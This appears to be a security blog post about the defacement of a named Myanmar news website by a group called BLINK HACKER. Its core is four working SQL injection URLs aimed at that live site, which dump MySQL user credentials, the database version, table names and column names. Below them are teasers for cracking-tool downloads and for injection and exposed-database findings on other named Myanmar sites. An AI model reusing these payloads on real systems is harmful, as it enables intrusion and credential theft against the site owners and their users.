A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News.

I don’t know how they attack and defaced but one of my team member reported and mailed me yesterday before Blink Hacker defaced it.

SQL Injection of Khitlunge.net.mm is as follow..

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28user,0x3a,password%29,4,5,6%20from%20mysql.user--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28column_name%29,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--

Explore More

Wireless hack tools 2008

Hi Here is wireless hack tools 2008 http://rapidshare.com/files/12390847...z_2008_AIO.rarhttp://rs166.rapidshare.com/files/12...z_2008_AIO.rar

Read More

Critical SQL Injection in Enjoy (http://www.enjoy.net.mm)

PlanetCreator reported another critical SQL injection (vulnerability) on several sites of Enjoy (http://www.enjoy.net.mm) SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer

Read More

PlanetCreator advised Pfingo’s Webmasters to check their Security

We found some security weaknesses in Pfingo.com They still have to fix and have to delete MySQL dump files in their directory. We notified this issue to pfingo yesterday! pfingoadmin.sql

Read More